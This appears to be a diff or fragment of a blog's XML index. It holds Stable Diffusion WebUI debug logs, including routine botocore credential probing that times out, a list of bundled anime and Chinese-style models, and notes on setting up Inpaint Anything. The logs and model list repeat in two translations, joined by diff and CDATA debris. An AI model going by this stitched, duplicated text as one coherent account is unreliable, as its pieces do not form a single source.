    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 123, in _send_output
    self.send(msg)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 218, in send
    return super().send(str)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 975, in send
    self.connect()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 205, in connect
    conn = self._new_conn()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
    raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<botocore.awsrequest.AWSHTTPConnection object at 0x7fd6b31d9a80>, 'Connection to 169.254.169.254 timed out. (connect timeout=1)')

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/utils.py", line 456, in _fetch_metadata_token
    response = self._session.send(request.prepare())
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 500, in send
    raise ConnectTimeoutError(endpoint_url=request.url, error=e)
    botocore.exceptions.ConnectTimeoutError: Connect timeout on endpoint URL: "http://169.254.169.254/latest/api/token"
    [2024-11-22 10:09:55,193][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/meta-data/iam/security-credentials/: Connect timeout on endpoint URL: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
    conn = connection.create_connection(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 95, in create_connection
    raise err
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 85, in create_connection
    sock.connect(sa)
    TimeoutError: timed out

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 465, in send
    urllib_response = conn.urlopen(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 787, in urlopen
    retries = retries.increment(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/retry.py", line 525, in increment
    raise six.reraise(type(error), error, _stacktrace)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/packages/six.py", line 770, in reraise
    raise value
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 703, in urlopen
    httplib_response = self._make_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 398, in _make_request
    conn.request(method, url, **httplib_request_kw)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 239, in request
    super(HTTPConnection, self).request(method, url, body=body, headers=headers)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1282, in request
    self._send_request(method, url, body, headers, encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 94, in _send_request
    rval = super()._send_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1328, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1277, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 123, in _send_output
    self.send(msg)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 218, in send
    return super().send(str)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 975, in send
    self.connect()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 205, in connect
    conn = self._new_conn()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
    raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<botocore.awsrequest.AWSHTTPConnection object at 0x7fd6b31d9f90>, 'Connection to 169.254.169.254 timed out. (connect timeout=1)')

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/utils.py", line 509, in _get_request
    response = self._session.send(request.prepare())
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 500, in send
    raise ConnectTimeoutError(endpoint_url=request.url, error=e)
    botocore.exceptions.ConnectTimeoutError: Connect timeout on endpoint URL: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    [2024-11-22 10:09:55,194][DEBUG][botocore.utils] - Max number of attempts exceeded (1) when attempting to retrieve data from metadata service.
    [2024-11-22 10:09:55,195][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/endpoints.json
    [2024-11-22 10:09:55,206][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sdk-default-configuration.json
    [2024-11-22 10:09:55,206][DEBUG][botocore.hooks] - Event choose-service-name: calling handler <function handle_service_name_alias at 0x7fd7d6e0ea70>
    [2024-11-22 10:09:55,218][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sts/2011-06-15/service-2.json
    [2024-11-22 10:09:55,231][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sts/2011-06-15/endpoint-rule-set-1.json.gz
    [2024-11-22 10:09:55,231][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/partitions.json
    [2024-11-22 10:09:55,232][DEBUG][botocore.hooks] - Event creating-client-class.sts: calling handler <function add_generate_presigned_url at 0x7fd7e4155cf0>
    [2024-11-22 10:09:55,234][DEBUG][botocore.endpoint] - Setting sts timeout as (60, 60)
    [2024-11-22 10:09:55,235][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/_retry.json
    [2024-11-22 10:09:55,235][DEBUG][botocore.client] - Registering retry handlers for service: sts
    [2024-11-22 10:09:55,236][DEBUG][botocore.hooks] - Event before-parameter-build.sts.GetCallerIdentity: calling handler <function generate_idempotent_uuid at 0x7fd7d6e2c0d0>
    [2024-11-22 10:09:55,236][DEBUG][botocore.regions] - Calling endpoint provider with parameters: {'Region': 'aws-global', 'UseDualStack': False, 'UseFIPS': False, 'UseGlobalEndpoint': True}
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Endpoint provider result: https://sts.amazonaws.com
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Selecting from endpoint provider's list of auth schemes: "sigv4". User selected auth scheme is: "None"
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Selected auth type "v4" as "v4" with signing context params: {'region': 'us-east-1', 'signing_name': 'sts'}
    [2024-11-22 10:09:55,238][DEBUG][botocore.hooks] - Event before-call.sts.GetCallerIdentity: calling handler <function add_recursion_detection_header at 0x7fd7d6e0fd00>
    [2024-11-22 10:09:55,238][DEBUG][botocore.hooks] - Event before-call.sts.GetCallerIdentity: calling handler <function inject_api_version_header_if_needed at 0x7fd7d6e2d900>
    [2024-11-22 10:09:55,238][DEBUG][botocore.endpoint] - Making request for OperationModel(name=GetCallerIdentity) with params: {'url_path': '/', 'query_string': '', 'method': 'POST', 'headers': {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', 'User-Agent': 'Boto3/1.26.144 Python/3.10.6 Linux/5.4.0-182-generic Botocore/1.29.144'}, 'body': {'Action': 'GetCallerIdentity', 'Version': '2011-06-15'}, 'url': 'https://sts.amazonaws.com/', 'context': {'client_region': 'aws-global', 'client_config': <botocore.config.Config object at 0x7fd6b31d9960>, 'has_streaming_input': False, 'auth_type': 'v4', 'signing': {'region': 'us-east-1', 'signing_name': 'sts'}}}
    [2024-11-22 10:09:55,239][DEBUG][botocore.hooks] - Event request-created.sts.GetCallerIdentity: calling handler <bound method RequestSigner.handler of <botocore.signers.RequestSigner object at 0x7fd6b31d9ab0>>
    [2024-11-22 10:09:55,239][DEBUG][botocore.hooks] - Event choose-signer.sts.GetCallerIdentity: calling handler <function set_operation_specific_signer at 0x7fd7d6e0ff40>

    To create a public link, set `share=True` in `launch()`.
    ----------------- light_diffusion_flow api start------------------
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Task queue is empty
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Registering APIs
    Startup time: 30.2s (prepare environment: 1.8s, import torch: 6.2s, import gradio: 1.1s, setup paths: 0.5s, initialize shared: 0.2s, other imports: 0.5s, load scripts: 11.1s, create ui: 3.5s, gradio launch: 2.6s, app_started_callback: 2.6s).
    a1535d0a42ce4f8822ed034c15aeff62cc515836e388511d294645d11db8c10d
    Loading weights [a1535d0a42] from /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors
    Creating model from config: /root/stable-diffusion-webui/configs/v1-inference.yaml
    Applying attention optimization: xformers... done.
    Model loaded in 13.2s (calculate hash: 11.6s, create model: 0.5s, apply weights to model: 0.8s, calculate empty prompt: 0.1s).
    refresh_ui
    [2024-11-22 10:12:54,488][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,492][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,495][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,500][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,502][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,504][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:14:08,139][INFO][modules.shared_state] - Starting job task(5iw18yq6o0rkn76)
    Warning: field infotext in API payload not found in <modules.processing.StableDiffusionProcessingTxt2Img object at 0x7fd72428a710>.
    0%| | 0/20 [00:00<?, ?it/s]
    5%|██▏ | 1/20 [00:00<00:08, 2.31it/s]
    25%|███████████ | 5/20 [00:00<00:01, 8.25it/s]
    35%|███████████████▍ | 7/20 [00:00<00:01, 9.97it/s]
    45%|███████████████████▊ | 9/20 [00:01<00:00, 11.13it/s]
    55%|███████████████████████▋ | 11/20 [00:01<00:00, 11.91it/s]
    65%|███████████████████████████▉ | 13/20 [00:01<00:00, 11.51it/s]
    75%|████████████████████████████████▎ | 15/20 [00:01<00:00, 12.95it/s]
    85%|████████████████████████████████████▌ | 17/20 [00:01<00:00, 13.15it/s]
    95%|████████████████████████████████████████▊ | 19/20 [00:01<00:00, 13.33it/s]
    100%|███████████████████████████████████████████| 20/20 [00:01<00:00, 10.93it/s]

    Total progress: 100%|███████████████████████████| 20/20 [00:01<00:00, 11.42it/s]
    [2024-11-22 10:14:10,403][INFO][modules.shared_state] - Ending job task(5iw18yq6o0rkn76) (2.26 seconds)

Built-in models

Mainstream models (checkpoint models)

• [Yuno779] Anything-ink (anime)

• [rqdwdw] Counterfeit-V3.0 (anime)

• [newlifezfztty761] CuteYukiMix-specialchapter (anime / cute-style specialization)

• [stabilityai] SD_XL (general purpose)

• [xiaolxl] GuoFeng4.1_2.5D_XL (2.5D / general purpose)

• [GhostInShell] GhostMix-V2.0 (2.5D)

• [s6yx] rev_1.2.2 (2.5D)

• [Aitasai] darkSushiMixMix 大颗寿司 Mix (2.5D / anime)

Recommended models (checkpoint models)

• [CagliostroLab] Animagine-XL-V3 (anime)

• [playgroundai] playground-v2-XL (13GB) (general purpose)

• [Yuno779] Anything-V3.0 (anime)

• [unknown] momoko-e (anime)

• [swl-models] PVCGK (figurine style)

• [xiaolxl] WestMagic (western fantasy / 2.5D)

Classic models (checkpoint models)

• [stabilityai] stable-diffusion-v1-5 (general purpose)

Guofeng (Chinese-style) series (checkpoint models)

• [xiaolxl] GuoFeng4.2XL (Chinese style / general purpose)

• [xiaolxl] GuoFeng4.0_Real_Beta (Chinese style / general purpose)

• [xiaolxl] GuoFeng3.4 (2.5D / Chinese style)

• [xiaolxl] GuoFeng3.3 (2.5D / Chinese style)

• [xiaolxl] GuoFeng3.2_light (2.5D / low-light specialization / Chinese style)

• [xiaolxl] GuoFeng3.2 (2.5D / Chinese style)

• [xiaolxl] GuoFeng3.1 (2.5D / Chinese style)

• [xiaolxl] GuoFeng2_MIX (2.5D / Chinese style)

• [xiaolxl] GuFengXL (anime / ancient Chinese style / general purpose)

• [xiaolxl] GuFeng2 (anime / ancient Chinese style)

• [xiaolxl] GuFeng1 (anime / ancient Chinese style)

Common LoRAs (LoRA models)

• [xiaolxl] GuFengXL_Lora (ancient Chinese style)

• [liaoliaojun-了了君] hanfuTang_v41_SDXL (Tang-style Hanfu)

• [simhuang] MoXinV1 (ink-wash style)

• [AlchemistW] 小人书2.0 (Chinese picture-book style)

• [liaoliaojun-了了君] 汉服3.0 (Hanfu)

• [CyberAIchemist] add_detail (detail adjustment)

• [samecorner] blindbox_v1_mix (blind box / figurine / cute)

• [xiaolxl] Dream (dreamlike)

• [xiaolxl] WuMo2 (martial-arts ink style)

Dependencies/models required by extensions

• ControlNet preprocessors (17GB+)

• Controlnet_v1_1_SD1.5 models, fp16 (11GB+)

• Controlnet_XL models, fp16 (25GB+)

• ControlNet additional model collection (20GB+)

• ControlNet additional LoRA collection (~1GB)

• AnimateDiff motion models (2GB+)

• Common VAE models

• AnimateDiff V2 motionLoRA and v3 AdapterLora (350MB)

• AnimateDiff V3 SparseControlNet model (2GB)

• Model pack for the TAG interrogator extension (~3GB)


Model websites

    ]]>
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Attempting to acquire lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Lock 140561340302624 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Attempting to acquire lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Lock 140561340312128 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
hand_yolov8n.pt: 0%| | 0.00/6.24M [00:00<?, ?B/s]
person_yolov8n-seg.pt: 0%| | 0.00/6.78M [00:00<?, ?B/s]
person_yolov8s-seg.pt: 0%| | 0.00/23.9M [00:00<?, ?B/s]
face_yolov8n.pt: 0%| | 0.00/6.23M [00:00<?, ?B/s]
hand_yolov8n.pt: 100%|█████████████████████| 6.24M/6.24M [00:01<00:00, 6.23MB/s]
[2024-11-22 10:09:41,420][DEBUG][filelock] - Attempting to release lock 140561340305072 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
[2024-11-22 10:09:41,420][DEBUG][filelock] - Lock 140561340305072 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
person_yolov8n-seg.pt: 100%|███████████████| 6.78M/6.78M [00:01<00:00, 5.19MB/s]
[2024-11-22 10:09:41,779][DEBUG][filelock] - Attempting to release lock 140561340307616 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
[2024-11-22 10:09:41,780][DEBUG][filelock] - Lock 140561340307616 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
face_yolov8n.pt: 100%|█████████████████████| 6.23M/6.23M [00:01<00:00, 4.71MB/s]
[2024-11-22 10:09:41,860][DEBUG][filelock] - Attempting to release lock 140561342047728 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
[2024-11-22 10:09:41,860][DEBUG][filelock] - Lock 140561342047728 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
person_yolov8s-seg.pt: 100%|███████████████| 23.9M/23.9M [00:02<00:00, 8.63MB/s]
[2024-11-22 10:09:43,256][DEBUG][filelock] - Attempting to release lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
[2024-11-22 10:09:43,256][DEBUG][filelock] - Lock 140561340312128 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
face_yolov8s.pt: 100%|█████████████████████| 22.5M/22.5M [00:02<00:00, 7.52MB/s]
[2024-11-22 10:09:43,628][DEBUG][filelock] - Attempting to release lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
[2024-11-22 10:09:43,628][DEBUG][filelock] - Lock 140561340302624 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [-] ADetailer initialized. version: 24.9.0, num models: 10
    Using sqlite file: /root/stable-diffusion-webui/extensions/sd-webui-agent-scheduler/task_scheduler.sqlite3
    ControlNet preprocessor location: /root/autodl-tmp/models/controlnet_annotator
    2024-11-22 10:09:46,370 - ControlNet - INFO - ControlNet v1.1.455
    Please 'pip install apex'
    [sd-webui-freeu] Controlnet support: *enabled*
    sd-webui-prompt-all-in-one background API service started successfully.
    2024-11-22 10:09:47,532 - roop - INFO - roop v0.0.2
    2024-11-22 10:09:47,627 - roop - INFO - roop v0.0.2
    [2024-11-22 10:09:48,591][DEBUG][api.py] - API flag not enabled, skipping API layer. Please enable with --api
    == WD14 tagger /gpu:0, uname_result(system='Linux', node='autodl-container-2cce11be52-d05bc5cf', release='5.4.0-182-generic', version='#202-Ubuntu SMP Fri Apr 26 12:29:36 UTC 2024', machine='x86_64') ==
    Checkpoint Anything-ink.safetensors [a1535d0a42] not found; loading fallback Anything-ink.safetensors
Calculating sha256 for /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors:
2024-11-22 10:09:50,529 - ControlNet - INFO - ControlNet UI callback registered.
LightDiffusionFlow binding complete
    *Deforum ControlNet support: enabled*
    [tag-editor] Custom taggers loaded: ['Improved Aesthetic Predictor', 'cafeai aesthetic classifier', 'aesthetic shadow', 'wd aesthetic classifier']
    Running on local URL: http://127.0.0.1:6006
[2024-11-22 10:09:53,176][DEBUG][botocore.hooks] - Changing event name from creating-client-class.iot-data to creating-client-class.iot-data-plane
[... ten similar botocore event-renaming DEBUG lines trimmed ...]
[2024-11-22 10:09:53,186][DEBUG][botocore.credentials] - Looking for credentials via: env
[... botocore probes the remaining credential sources (assume-role, sso, shared-credentials-file, config-file, ec2-credentials-file, boto-config, container-role, iam-role) without finding any ...]
[2024-11-22 10:09:54,190][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/api/token: Connect timeout on endpoint URL: "http://169.254.169.254/latest/api/token"
[2024-11-22 10:09:55,193][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/meta-data/iam/security-credentials/: Connect timeout on endpoint URL: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
[... two near-identical urllib3/botocore connect-timeout tracebacks trimmed: the AutoDL container has no route to the EC2 instance-metadata endpoint 169.254.169.254 ...]
[2024-11-22 10:09:55,194][DEBUG][botocore.utils] - Max number of attempts exceeded (1) when attempting to retrieve data from metadata service.
[... botocore then loads its bundled endpoint/service JSON data and prepares an unauthenticated sts.GetCallerIdentity request against https://sts.amazonaws.com/ ...]

    To create a public link, set `share=True` in `launch()`.
    ----------------- light_diffusion_flow api start------------------
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Task queue is empty
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Registering APIs
    Startup time: 30.2s (prepare environment: 1.8s, import torch: 6.2s, import gradio: 1.1s, setup paths: 0.5s, initialize shared: 0.2s, other imports: 0.5s, load scripts: 11.1s, create ui: 3.5s, gradio launch: 2.6s, app_started_callback: 2.6s).
    a1535d0a42ce4f8822ed034c15aeff62cc515836e388511d294645d11db8c10d
    Loading weights [a1535d0a42] from /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors
    Creating model from config: /root/stable-diffusion-webui/configs/v1-inference.yaml
    Applying attention optimization: xformers... done.
    Model loaded in 13.2s (calculate hash: 11.6s, create model: 0.5s, apply weights to model: 0.8s, calculate empty prompt: 0.1s).
    refresh_ui
    [2024-11-22 10:12:54,488][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,492][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,495][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,500][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,502][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,504][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:14:08,139][INFO][modules.shared_state] - Starting job task(5iw18yq6o0rkn76)
    Warning: field infotext in API payload not found in <modules.processing.StableDiffusionProcessingTxt2Img object at 0x7fd72428a710>.
    0%| | 0/20 [00:00<?, ?it/s]
    5%|██▏ | 1/20 [00:00<00:08, 2.31it/s]
    25%|███████████ | 5/20 [00:00<00:01, 8.25it/s]
    35%|███████████████▍ | 7/20 [00:00<00:01, 9.97it/s]
    45%|███████████████████▊ | 9/20 [00:01<00:00, 11.13it/s]
    55%|███████████████████████▋ | 11/20 [00:01<00:00, 11.91it/s]
    65%|███████████████████████████▉ | 13/20 [00:01<00:00, 11.51it/s]
    75%|████████████████████████████████▎ | 15/20 [00:01<00:00, 12.95it/s]
    85%|████████████████████████████████████▌ | 17/20 [00:01<00:00, 13.15it/s]
    95%|████████████████████████████████████████▊ | 19/20 [00:01<00:00, 13.33it/s]
    100%|███████████████████████████████████████████| 20/20 [00:01<00:00, 10.93it/s]

    Total progress: 100%|███████████████████████████| 20/20 [00:01<00:00, 11.42it/s]
    [2024-11-22 10:14:10,403][INFO][modules.shared_state] - Ending job task(5iw18yq6o0rkn76) (2.26 seconds)

Built-in models

Mainstream models (checkpoints)

• [Yuno779] Anything-ink (anime)

• [rqdwdw] Counterfeit-V3.0 (anime)

• [newlifezfztty761] CuteYukiMix-specialchapter (anime / specialized cute style)

• [stabilityai] SD_XL (general-purpose)

• [xiaolxl] GuoFeng4.1_2.5D_XL (2.5D / general-purpose)

• [GhostInShell] GhostMix-V2.0 (2.5D)

• [s6yx] rev_1.2.2 (2.5D)

• [Aitasai] darkSushiMixMix 大颗寿司 Mix (2.5D / anime)

Recommended models (checkpoints)

• [CagliostroLab] Animagine-XL-V3 (anime)

• [playgroundai] playground-v2-XL (13GB) (general-purpose)

• [Yuno779] Anything-V3.0 (anime)

• [unknown] momoko-e (anime)

• [swl-models] PVCGK (figurine style)

• [xiaolxl] WestMagic (Western fantasy / 2.5D)

Classic models (checkpoints)

• [stabilityai] stable-diffusion-v1-5 (general-purpose)

Chinese-style series (checkpoints)

• [xiaolxl] GuoFeng4.2XL (Chinese style / general-purpose)

• [xiaolxl] GuoFeng4.0_Real_Beta (Chinese style / general-purpose)

• [xiaolxl] GuoFeng3.4 (2.5D / Chinese style)

• [xiaolxl] GuoFeng3.3 (2.5D / Chinese style)

• [xiaolxl] GuoFeng3.2_light (2.5D / specialized for low light / Chinese style)

• [xiaolxl] GuoFeng3.2 (2.5D / Chinese style)

• [xiaolxl] GuoFeng3.1 (2.5D / Chinese style)

• [xiaolxl] GuoFeng2_MIX (2.5D / Chinese style)

• [xiaolxl] GuFengXL (anime / ancient Chinese style / general-purpose)

• [xiaolxl] GuFeng2 (anime / ancient Chinese style)

• [xiaolxl] GuFeng1 (anime / ancient Chinese style)

Common LoRAs (LoRA models)

• [xiaolxl] GuFengXL_Lora (ancient Chinese style)

• [liaoliaojun-了了君] hanfuTang_v41_SDXL (Tang-dynasty Hanfu)

• [simhuang] MoXinV1 (ink-wash style)

• [AlchemistW] 小人书2.0 (picture-storybook style)

• [liaoliaojun-了了君] 汉服3.0 (Hanfu)

• [CyberAIchemist] add_detail (detail adjustment)

• [samecorner] blindbox_v1_mix (blind box / figurine / cute)

• [xiaolxl] Dream (dreamy)

• [xiaolxl] WuMo2 (martial-arts ink style)

Dependencies/models required by extensions

• ControlNet preprocessors (17GB+)

• Controlnet_v1_1_SD1.5 models, fp16 (11GB+)

• Controlnet_XL models, fp16 (25GB+)

• ControlNet additional models collection (20GB+)

• ControlNet additional LoRA collection (~1GB)

• AnimateDiff motion models (2GB+)

• Common VAE models

• motionLoRA and v3AdapterLora for AnimateDiffV2 (350MB)

• SparseControlNet models for AnimateDiffV3 (2GB)

• Dependency model pack for the TAG interrogation extension (~3GB)

Model websites

    ]]>
@@ -7140,7 +7140,7 @@ /posts/Paper-Inpaint%20Anything/ - Resources

Notes

png

Illustration of Inpaint Anything. Users can select any object in an image by clicking on it. With powerful vision models such as SAM [7], LaMa [13], and Stable Diffusion (SD) [11], Inpaint Anything can smoothly remove the object (i.e., Remove Anything). Further, prompted with text, users can fill the object with any desired content (i.e., Fill Anything) or arbitrarily replace the object's background (i.e., Replace Anything).


• Modern image inpainting systems often struggle with mask selection and hole filling.
• The paper attempts mask-free image inpainting and proposes a new "click-and-fill" paradigm called Inpaint Anything (IA), which supports three main functions:
  • Remove Anything: the user clicks any object and IA removes it, filling in the background
    • SAM + SOTA
      • SAM has demonstrated promising segmentation capabilities in a wide variety of scenarios and shows the great potential of foundation models for computer vision. It is a breakthrough step toward visual artificial general intelligence, and SAM has been hailed as "the ChatGPT of CV".
      • Studies LaMa [13], a simple single-stage method for mask-based inpainting that combines fast Fourier convolutions (FFCs) [1], a perceptual loss [6], and an aggressive training-mask generation strategy to reproduce repetitive visual structures well.
  • Fill Anything: the user gives IA a text prompt, and IA drives an AIGC model such as Stable Diffusion to replace the object with the corresponding generated content
    • SAM + AIGC
    • Uses a powerful AIGC Stable Diffusion [11] model to generate the desired content in the hole from a text prompt
  • Replace Anything: the user keeps the clicked object and has IA replace the remaining background with newly generated content

Code

Setting up the environment

Since a segment-anything environment was already set up, clone it:

conda create -n inpaint-anything --clone segment-anything

Download the code from geekyutao/Inpaint-Anything: Inpaint anything using Segment Anything and inpainting models. (github.com):

png

In the repository directory:

python -m pip install -e segment_anything

A huge pile of packages... this thing is so slow!

python -m pip install -r lama/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

Download the pretrained models sam_vit_h_4b8939.pth and big-lama (the latter is on a Russian file-hosting site; registering took forever, what a pain), and put them in ./pretrained_models

png

Run the example command in PyCharm's terminal:

python fill_anything.py --input_img ./example/remove-anything/dog.jpg  --point_coords 750 500  --point_labels 1  --text_prompt "a teddy bear on a bench" --dilate_kernel_size 15  --output_dir ./results --sam_model_type "vit_h" --sam_ckpt ./pretrained_models/sam_vit_h_4b8939.pth

Another pile of downloads; just wait.

png

It says I'm out of VRAM. Game over!

torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 640.00 MiB (GPU 0; 8.00 GiB total capacity; 6.16 GiB already allocated; 0 bytes free; 6.66 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid fragmentation
pip install git+https://github.com/openai/CLIP.git
